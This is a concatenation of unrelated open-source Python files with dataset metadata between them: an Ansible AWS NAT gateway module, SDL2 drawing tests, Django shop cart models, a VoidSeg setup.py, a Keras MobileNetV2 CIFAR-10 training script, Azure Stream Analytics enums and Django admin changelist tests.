"""Delete an Amazon NAT Gateway.
Args:
client (botocore.client.EC2): Boto3 client
nat_gateway_id (str): The Amazon nat id.
Kwargs:
wait (bool): Wait for the nat to be in the deleted state before returning.
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
release_eip (bool): Once the nat has been deleted, you can deallocate the eip from the vpc.
Basic Usage:
>>> client = boto3.client('ec2')
>>> nat_gw_id = 'nat-03835afb6e31df79b'
>>> remove(client, nat_gw_id, wait=True, wait_timeout=500, release_eip=True)
[
true,
"",
{
"nat_gateway_id": "nat-03835afb6e31df79b",
"subnet_id": "subnet-w4t12897",
"nat_gateway_addresses": [
{
"public_ip": "52.87.29.36",
"network_interface_id": "eni-5579742d",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-36014da3"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-w68571b5"
}
]
Returns:
        Tuple (bool, bool, str, dict)
"""
params = {
'NatGatewayId': nat_gateway_id
}
success = False
changed = False
err_msg = ""
    results = list()
    allocation_id = None
states = ['pending', 'available']
try:
exist, err_msg, gw = (
get_nat_gateways(
client, nat_gateway_id=nat_gateway_id,
states=states, check_mode=check_mode
)
)
if exist and len(gw) == 1:
results = gw[0]
if not check_mode:
client.delete_nat_gateway(**params)
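            # Remember the allocation id now so the EIP can optionally be
            # released once the gateway itself is gone.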
allocation_id = (
results['nat_gateway_addresses'][0]['allocation_id']
)
changed = True
success = True
err_msg = (
'NAT gateway {0} is in a deleting state. Delete was successful'
.format(nat_gateway_id)
)
if wait:
status_achieved, err_msg, results = (
wait_for_status(
client, wait_timeout, nat_gateway_id, 'deleted',
check_mode=check_mode
)
)
if status_achieved:
err_msg = (
'NAT gateway {0} was deleted successfully'
.format(nat_gateway_id)
)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
    if release_eip and allocation_id:
eip_released, eip_err = (
release_address(client, allocation_id, check_mode)
)
if not eip_released:
err_msg = (
"{0}: Failed to release EIP {1}: {2}"
.format(err_msg, allocation_id, eip_err)
)
success = False
return success, changed, err_msg, results
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
subnet_id=dict(type='str'),
eip_address=dict(type='str'),
allocation_id=dict(type='str'),
if_exist_do_not_create=dict(type='bool', default=False),
state=dict(default='present', choices=['present', 'absent']),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=320, required=False),
release_eip=dict(type='bool', default=False),
nat_gateway_id=dict(type='str'),
client_token=dict(type='str'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[
['allocation_id', 'eip_address']
],
required_if=[['state', 'absent', ['nat_gateway_id']],
['state', 'present', ['subnet_id']]]
)
# Validate Requirements
if not HAS_BOTO3:
module.fail_json(msg='botocore/boto3 is required.')
state = module.params.get('state').lower()
check_mode = module.check_mode
subnet_id = module.params.get('subnet_id')
allocation_id = module.params.get('allocation_id')
eip_address = module.params.get('eip_address')
nat_gateway_id = module.params.get('nat_gateway_id')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
release_eip = module.params.get('release_eip')
client_token = module.params.get('client_token')
if_exist_do_not_create = module.params.get('if_exist_do_not_create')
try:
region, ec2_url, aws_connect_kwargs = (
get_aws_connection_info(module, boto3=True)
)
client = (
boto3_conn(
module, conn_type='client', resource='ec2',
region=region, endpoint=ec2_url, **aws_connect_kwargs
)
)
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Boto3 Client Error - " + str(e.msg))
changed = False
err_msg = ''
if state == 'present':
success, changed, err_msg, results = (
pre_create(
client, subnet_id, allocation_id, eip_address,
if_exist_do_not_create, wait, wait_timeout,
client_token, check_mode=check_mode
)
)
else:
success, changed, err_msg, results = (
remove(
client, nat_gateway_id, wait, wait_timeout, release_eip,
check_mode=check_mode
)
)
if not success:
module.fail_json(
msg=err_msg, success=success, changed=changed
)
else:
module.exit_json(
msg=err_msg, success=success, changed=changed, **results
)
if __name__ == '__main__':
main()
| 32.087805
| 125
| 0.561204
|
ec06965a1e5120c2ae6bf614761527fb8942092d
| 3,015
|
py
|
Python
|
python/masa/lib/python3.4/site-packages/sdl2/test/sdl2ext_draw_test.py
|
tekktonic/programming
|
139959ab9934912d4c531e5ee8b1f39094a6823c
|
[
"0BSD"
] | 3
|
2016-07-16T12:19:43.000Z
|
2021-04-22T19:25:53.000Z
|
sdl2/test/sdl2ext_draw_test.py
|
GreatFruitOmsk/py-sdl2
|
8d1465b6238ab33c14ce0dc473529e7b38650062
|
[
"DOC"
] | null | null | null |
sdl2/test/sdl2ext_draw_test.py
|
GreatFruitOmsk/py-sdl2
|
8d1465b6238ab33c14ce0dc473529e7b38650062
|
[
"DOC"
] | 3
|
2018-09-13T09:08:02.000Z
|
2021-04-07T18:44:32.000Z
|
import sys
import unittest
from ..ext.color import Color, COLOR
from .. import ext as sdl2ext
class SDL2ExtDrawTest(unittest.TestCase):
__tags__ = ["sdl", "sdl2ext"]
def setUp(self):
sdl2ext.init()
def tearDown(self):
sdl2ext.quit()
@unittest.skipIf(hasattr(sys, "pypy_version_info"),
"PyPy's ctypes can't do byref(value, offset)")
@unittest.skipIf(sys.platform=="cli", "IronPython can't cast correctly")
def test_fill(self):
# TODO: add exceptions and more bounding tests.
rects = ((0, 0, 3, 2),
(2, 3, 4, 2),
(5, -1, 2, 2),
(1, 7, 4, 8)
)
factory = sdl2ext.SpriteFactory(sdl2ext.SOFTWARE)
sprite = factory.create_sprite(size=(10, 10), bpp=32)
view = sdl2ext.PixelView(sprite)
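        # PixelView exposes the sprite's raw pixel buffer as a 2D (row, column)
        # sequence, so individual pixels can be inspected after each fill().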
for rect in rects:
sdl2ext.fill(sprite, 0)
colorval = sdl2ext.prepare_color(0xAABBCCDD, sprite)
sdl2ext.fill(sprite, 0xAABBCCDD, rect)
for y, row in enumerate(view):
for x, col in enumerate(row):
if y >= rect[1] and y < (rect[1] + rect[3]):
if x >= rect[0] and x < (rect[0] + rect[2]):
                            self.assertEqual(col, colorval,
                                             "color mismatch at (%d, %d)" % (x, y))
else:
                            self.assertEqual(col, 0,
                                             "color mismatch at (%d, %d)" % (x, y))
else:
self.assertEqual(col, 0, "color mismatch at (x, y)")
@unittest.skipIf(sys.platform=="cli",
"IronPython does not convert int values correctly")
def test_prepare_color(self):
rcolors = (Color(0, 0, 0, 0),
Color(255, 255, 255, 255),
Color(8, 55, 110, 220),
)
icolors = (0x00000000,
0xFFFFFFFF,
0xAABBCCDD,
)
scolors = ("#000",
"#FFF",
"#AABBCCDD",
)
factory = sdl2ext.SpriteFactory(sdl2ext.SOFTWARE)
sprite = factory.create_sprite(size=(10, 10), bpp=32,
masks=(0xFF000000,
0x00FF0000,
0x0000FF00,
0x000000FF))
for color in rcolors:
c = sdl2ext.prepare_color(color, sprite)
self.assertEqual(c, int(color))
for color in icolors:
c = sdl2ext.prepare_color(color, sprite)
cc = COLOR(color)
self.assertEqual(c, int(cc))
for color in scolors:
c = sdl2ext.prepare_color(color, sprite)
cc = COLOR(color)
self.assertEqual(c, int(cc))
if __name__ == '__main__':
sys.exit(unittest.main())
| 35.892857
| 76
| 0.46534
|
56194e6f60448bed155e64eb651dc3dd3fcd5000
| 2,416
|
py
|
Python
|
cart/models.py
|
lautarianoo/django_shop
|
9bc575df8b7af5452bd15cc3cf4fb375be6384bd
|
[
"MIT"
] | null | null | null |
cart/models.py
|
lautarianoo/django_shop
|
9bc575df8b7af5452bd15cc3cf4fb375be6384bd
|
[
"MIT"
] | null | null | null |
cart/models.py
|
lautarianoo/django_shop
|
9bc575df8b7af5452bd15cc3cf4fb375be6384bd
|
[
"MIT"
] | null | null | null |
from django.db import models
from product.models import Product
from django.core import checks
from customer.models import Customer
class CartItem(models.Model):
product = models.OneToOneField(
Product,
on_delete=models.CASCADE,
blank=True,
related_name='items',
)
quantity = models.IntegerField("Количество", default=1)
date_add = models.DateTimeField(auto_now_add=True)
total_price = models.IntegerField("Окончательная цена", default=0)
class Meta:
verbose_name = "Объект корзины"
verbose_name_plural = "Объекты корзины"
def save(self, *args, **kwargs):
for price in range(self.quantity):
self.total_price += self.product.price
super().save(*args, **kwargs)
def __str__(self):
return f"Объект корзины | {self.product.title}"
@classmethod
def check(cls, **kwargs):
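        # Django system-check hook: ensure the model defines a numeric
        # `quantity` field of one of the allowed types.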
errors = super().check(**kwargs)
allowed_types = ['IntegerField', 'SmallIntegerField', 'PositiveIntegerField',
'PositiveSmallIntegerField', 'DecimalField', 'FloatField']
for field in cls._meta.fields:
if field.attname == 'quantity':
if field.get_internal_type() not in allowed_types:
msg = "Class `{}.quantity` must be of one of the types: {}."
errors.append(checks.Error(msg.format(cls.__name__, allowed_types)))
break
else:
msg = "Class `{}` must implement a field named `quantity`."
errors.append(checks.Error(msg.format(cls.__name__)))
return errors
class Cart(models.Model):
customer = models.OneToOneField(
Customer,
on_delete=models.CASCADE,
blank=True,
related_name='cart'
)
cart_items = models.ManyToManyField(
CartItem,
blank=True,
related_name='cart'
)
total_price = models.IntegerField("Тотал прайс корзины", default=0)
date_create = models.DateTimeField(auto_now_add=True)
class Meta:
verbose_name = 'Корзина'
verbose_name_plural = 'Корзины'
def __str__(self):
return f"Корзина {self.customer.user.email}"
def save(self, *args, **kwargs):
price = 0
for item in self.cart_items.all():
price+=item.total_price
self.total_price = price
return super().save(*args, **kwargs)
| 32.648649
| 88
| 0.622517
|
fd30fca01f409dfa24f44f7843e51312648c2b13
| 1,894
|
py
|
Python
|
setup.py
|
psteinb/VoidSeg
|
6e091656f6d777452b0e36644e9eb4a6818792d2
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
psteinb/VoidSeg
|
6e091656f6d777452b0e36644e9eb4a6818792d2
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
psteinb/VoidSeg
|
6e091656f6d777452b0e36644e9eb4a6818792d2
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from setuptools import setup, find_packages
from os import path
_dir = path.abspath(path.dirname(__file__))
with open(path.join(_dir,'voidseg','version.py')) as f:
exec(f.read())
with open(path.join(_dir,'README.md')) as f:
long_description = f.read()
setup(name='voidseg',
version=__version__,
      description='VoidSeg is an implementation of 3-class U-Net and StarDist segmentation networks using self-supervised '
                  'Noise2Void denoising for segmentation with limited training data. '
                  'This implementation extends CARE and uses Noise2Void and StarDist.',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/juglab/VoidSeg/',
author='Mangal Prakash, Tim-Oliver Buchholz, Manan Lalit, Florian Jug, Alexander Krull',
author_email='prakash@mpi-cbg.de, tibuch@mpi-cbg.de, lalit@mpi-cbg.de, jug@mpi-cbg.de, krull@mpi-cbg.de',
license='BSD 3-Clause License',
packages=find_packages(),
project_urls={
'Repository': 'https://github.com/juglab/VoidSeg/',
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
install_requires=[
"n2v",
"stardist",
"numpy",
"scipy",
"matplotlib",
"six",
"keras>=2.2.4,<2.3.0",
"tifffile",
"tqdm",
"pathlib2;python_version<'3'",
"backports.tempfile;python_version<'3.4'",
"csbdeep>=0.4.0,<0.5.0"
]
)
| 33.22807
| 123
| 0.609293
|
b980cb61d083ff368279a229451f13d55386f0b1
| 5,684
|
py
|
Python
|
examples/pwr_run/checkpointing/jobs_max_par/job8.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/jobs_max_par/job8.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/jobs_max_par/job8.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a MobileNetV2 on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.mobilenet_v2 import MobileNetV2
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.set_defaults(resume=False)
args = parser.parse_args()
# Training parameters
batch_size = 256
args_lr = 0.002
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_max_param/' + job_name + '*'
total_epochs = 7
starting_epoch = 0
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
model = keras.models.load_model(save_file)
else:
print('train from start')
model = models.Sequential()
base_model = MobileNetV2(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(128, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(64, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connect the SIGTERM signal to a checkpointing handler #####################
def terminateProcess(signalNumber, frame):
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_max_param/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
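# Record this job's trainable-parameter count in the shared param.json so that
# an external process (not part of this script) can read it.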
param_dict = {}
modify = False
with open('param.json', 'r') as fp:
param_dict = json.load(fp)
if job_name not in param_dict:
param_dict[job_name] = trainable_count
modify = True
elif param_dict[job_name] != trainable_count:
param_dict[job_name] = trainable_count
modify = True
if modify:
with open('param.json', 'w') as fp:
json.dump(param_dict, fp)
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=total_epochs,
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch
#verbose=0
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
finish_dict = {}
with open('finish.json', 'r') as fp:
finish_dict = json.load(fp)
finish_dict[job_name] = 1
with open('finish.json', 'w') as fp:
json.dump(finish_dict, fp)
| 29.915789
| 118
| 0.703202
|
11e75c1655ee37ec4ce251e89bcb7784ac79cc0f
| 4,046
|
py
|
Python
|
sdk/python/pulumi_azure_native/streamanalytics/v20200301/_enums.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/streamanalytics/v20200301/_enums.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/streamanalytics/v20200301/_enums.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'AuthenticationMode',
'CompatibilityLevel',
'CompressionType',
'ContentStoragePolicy',
'Encoding',
'EventSerializationType',
'EventsOutOfOrderPolicy',
'JobType',
'JsonOutputSerializationFormat',
'OutputErrorPolicy',
'OutputStartMode',
'RefreshType',
'SkuName',
]
class AuthenticationMode(str, Enum):
"""
Authentication Mode.
"""
MSI = "Msi"
USER_TOKEN = "UserToken"
CONNECTION_STRING = "ConnectionString"
class CompatibilityLevel(str, Enum):
"""
Controls certain runtime behaviors of the streaming job.
"""
COMPATIBILITY_LEVEL_1_0 = "1.0"
COMPATIBILITY_LEVEL_1_2 = "1.2"
class CompressionType(str, Enum):
"""
Indicates the type of compression that the input uses. Required on PUT (CreateOrReplace) requests.
"""
NONE = "None"
G_ZIP = "GZip"
DEFLATE = "Deflate"
class ContentStoragePolicy(str, Enum):
"""
    Valid values are JobStorageAccount and SystemAccount. If set to JobStorageAccount, this requires the user to also specify the jobStorageAccount property.
"""
SYSTEM_ACCOUNT = "SystemAccount"
JOB_STORAGE_ACCOUNT = "JobStorageAccount"
class Encoding(str, Enum):
"""
Specifies the encoding of the incoming data in the case of input and the encoding of outgoing data in the case of output. Required on PUT (CreateOrReplace) requests.
"""
UTF8 = "UTF8"
class EventSerializationType(str, Enum):
"""
Indicates the type of serialization that the input or output uses. Required on PUT (CreateOrReplace) requests.
"""
CSV = "Csv"
AVRO = "Avro"
JSON = "Json"
PARQUET = "Parquet"
class EventsOutOfOrderPolicy(str, Enum):
"""
Indicates the policy to apply to events that arrive out of order in the input event stream.
"""
ADJUST = "Adjust"
DROP = "Drop"
class JobType(str, Enum):
"""
    Describes the type of the job. Valid modes are `Cloud` and `Edge`.
"""
CLOUD = "Cloud"
EDGE = "Edge"
class JsonOutputSerializationFormat(str, Enum):
"""
This property only applies to JSON serialization of outputs only. It is not applicable to inputs. This property specifies the format of the JSON the output will be written in. The currently supported values are 'lineSeparated' indicating the output will be formatted by having each JSON object separated by a new line and 'array' indicating the output will be formatted as an array of JSON objects. Default value is 'lineSeparated' if left null.
"""
LINE_SEPARATED = "LineSeparated"
ARRAY = "Array"
class OutputErrorPolicy(str, Enum):
"""
Indicates the policy to apply to events that arrive at the output and cannot be written to the external storage due to being malformed (missing column values, column values of wrong type or size).
"""
STOP = "Stop"
DROP = "Drop"
class OutputStartMode(str, Enum):
"""
This property should only be utilized when it is desired that the job be started immediately upon creation. Value may be JobStartTime, CustomTime, or LastOutputEventTime to indicate whether the starting point of the output event stream should start whenever the job is started, start at a custom user time stamp specified via the outputStartTime property, or start from the last event output time.
"""
JOB_START_TIME = "JobStartTime"
CUSTOM_TIME = "CustomTime"
LAST_OUTPUT_EVENT_TIME = "LastOutputEventTime"
class RefreshType(str, Enum):
"""
Indicates the type of data refresh option.
"""
STATIC = "Static"
REFRESH_PERIODICALLY_WITH_FULL = "RefreshPeriodicallyWithFull"
REFRESH_PERIODICALLY_WITH_DELTA = "RefreshPeriodicallyWithDelta"
class SkuName(str, Enum):
"""
The name of the SKU. Required on PUT (CreateOrReplace) requests.
"""
STANDARD = "Standard"
| 31.123077
| 449
| 0.702422
|
ec8018e8afa9e80685f0829b3c1bdb2e01a2511a
| 36,990
|
py
|
Python
|
tests/admin_changelist/tests.py
|
TomasM/django
|
1fc28b7aef76115fcd6e3931f0c0dda175297d3f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/admin_changelist/tests.py
|
TomasM/django
|
1fc28b7aef76115fcd6e3931f0c0dda175297d3f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/admin_changelist/tests.py
|
TomasM/django
|
1fc28b7aef76115fcd6e3931f0c0dda175297d3f
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import unicode_literals
import datetime
from django.contrib import admin
from django.contrib.admin.models import LogEntry
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.templatetags.admin_list import pagination
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.contrib.admin.views.main import ALL_VAR, SEARCH_VAR, ChangeList
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template import Context, Template
from django.test import TestCase, override_settings
from django.test.client import RequestFactory
from django.utils import formats, six
from .admin import (
BandAdmin, ChildAdmin, ChordsBandAdmin, ConcertAdmin,
CustomPaginationAdmin, CustomPaginator, DynamicListDisplayChildAdmin,
DynamicListDisplayLinksChildAdmin, DynamicListFilterChildAdmin,
DynamicSearchFieldsChildAdmin, FilteredChildAdmin, GroupAdmin,
InvitationAdmin, NoListDisplayLinksParentAdmin, ParentAdmin, QuartetAdmin,
SwallowAdmin, site as custom_site,
)
from .models import (
Band, Child, ChordsBand, ChordsMusician, Concert, CustomIdUser, Event,
Genre, Group, Invitation, Membership, Musician, OrderedObject, Parent,
Quartet, Swallow, UnorderedObject,
)
@override_settings(ROOT_URLCONF="admin_changelist.urls")
class ChangeListTests(TestCase):
def setUp(self):
self.factory = RequestFactory()
def _create_superuser(self, username):
return User.objects.create(username=username, is_superuser=True)
def _mocked_authenticated_request(self, url, user):
request = self.factory.get(url)
request.user = user
return request
def test_select_related_preserved(self):
"""
Regression test for #10348: ChangeList.get_queryset() shouldn't
overwrite a custom select_related provided by ModelAdmin.get_queryset().
"""
m = ChildAdmin(Child, admin.site)
request = self.factory.get('/child/')
list_select_related = m.get_list_select_related(request)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
self.assertEqual(cl.queryset.query.select_related, {
'parent': {'name': {}}
})
def test_select_related_as_tuple(self):
ia = InvitationAdmin(Invitation, admin.site)
request = self.factory.get('/invitation/')
list_select_related = ia.get_list_select_related(request)
cl = ChangeList(request, Child, ia.list_display, ia.list_display_links,
ia.list_filter, ia.date_hierarchy, ia.search_fields,
list_select_related, ia.list_per_page,
ia.list_max_show_all, ia.list_editable, ia)
self.assertEqual(cl.queryset.query.select_related, {'player': {}})
def test_select_related_as_empty_tuple(self):
ia = InvitationAdmin(Invitation, admin.site)
ia.list_select_related = ()
request = self.factory.get('/invitation/')
list_select_related = ia.get_list_select_related(request)
cl = ChangeList(request, Child, ia.list_display, ia.list_display_links,
ia.list_filter, ia.date_hierarchy, ia.search_fields,
list_select_related, ia.list_per_page,
ia.list_max_show_all, ia.list_editable, ia)
self.assertEqual(cl.queryset.query.select_related, False)
def test_get_select_related_custom_method(self):
class GetListSelectRelatedAdmin(admin.ModelAdmin):
list_display = ('band', 'player')
def get_list_select_related(self, request):
return ('band', 'player')
ia = GetListSelectRelatedAdmin(Invitation, admin.site)
request = self.factory.get('/invitation/')
list_select_related = ia.get_list_select_related(request)
cl = ChangeList(request, Child, ia.list_display, ia.list_display_links,
ia.list_filter, ia.date_hierarchy, ia.search_fields,
list_select_related, ia.list_per_page,
ia.list_max_show_all, ia.list_editable, ia)
self.assertEqual(cl.queryset.query.select_related, {'player': {}, 'band': {}})
def test_result_list_empty_changelist_value(self):
"""
Regression test for #14982: EMPTY_CHANGELIST_VALUE should be honored
for relationship fields
"""
new_child = Child.objects.create(name='name', parent=None)
request = self.factory.get('/child/')
m = ChildAdmin(Child, admin.site)
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
cl = ChangeList(request, Child, list_display, list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = '<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th><td class="field-parent nowrap">-</td></tr></tbody>' % link
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_html(self):
"""
        Verifies that the inclusion tag result_list generates a table when
        using default ModelAdmin settings.
"""
new_parent = Parent.objects.create(name='parent')
new_child = Child.objects.create(name='name', parent=new_parent)
request = self.factory.get('/child/')
m = ChildAdmin(Child, admin.site)
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
cl = ChangeList(request, Child, list_display, list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = '<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th><td class="field-parent nowrap">Parent object</td></tr></tbody>' % link
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_editable_html(self):
"""
Regression tests for #11791: Inclusion tag result_list generates a
table and this checks that the items are nested within the table
element tags.
Also a regression test for #13599, verifies that hidden fields
when list_editable is enabled are rendered in a div outside the
table.
"""
new_parent = Parent.objects.create(name='parent')
new_child = Child.objects.create(name='name', parent=new_parent)
request = self.factory.get('/child/')
m = ChildAdmin(Child, admin.site)
# Test with list_editable fields
m.list_display = ['id', 'name', 'parent']
m.list_display_links = ['id']
m.list_editable = ['name']
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
FormSet = m.get_changelist_formset(request)
cl.formset = FormSet(queryset=cl.result_list)
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
# make sure that hidden fields are in the correct place
hiddenfields_div = '<div class="hiddenfields"><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></div>' % new_child.id
self.assertInHTML(hiddenfields_div, table_output, msg_prefix='Failed to find hidden fields')
# make sure that list editable fields are rendered in divs correctly
editable_name_field = '<input name="form-0-name" value="name" class="vTextField" maxlength="30" type="text" id="id_form-0-name" />'
self.assertInHTML('<td class="field-name">%s</td>' % editable_name_field, table_output, msg_prefix='Failed to find "name" list_editable field')
def test_result_list_editable(self):
"""
Regression test for #14312: list_editable with pagination
"""
new_parent = Parent.objects.create(name='parent')
for i in range(200):
Child.objects.create(name='name %s' % i, parent=new_parent)
request = self.factory.get('/child/', data={'p': -1}) # Anything outside range
m = ChildAdmin(Child, admin.site)
# Test with list_editable fields
m.list_display = ['id', 'name', 'parent']
m.list_display_links = ['id']
m.list_editable = ['name']
self.assertRaises(IncorrectLookupParameters, lambda:
ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m))
def test_custom_paginator(self):
new_parent = Parent.objects.create(name='parent')
for i in range(200):
Child.objects.create(name='name %s' % i, parent=new_parent)
request = self.factory.get('/child/')
m = CustomPaginationAdmin(Child, admin.site)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
self.assertIsInstance(cl.paginator, CustomPaginator)
def test_distinct_for_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Basic ManyToMany.
"""
blues = Genre.objects.create(name='Blues')
band = Band.objects.create(name='B.B. King Review', nr_of_members=11)
band.genres.add(blues)
band.genres.add(blues)
m = BandAdmin(Band, admin.site)
request = self.factory.get('/band/', data={'genres': blues.pk})
cl = ChangeList(request, Band, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Group instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_through_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
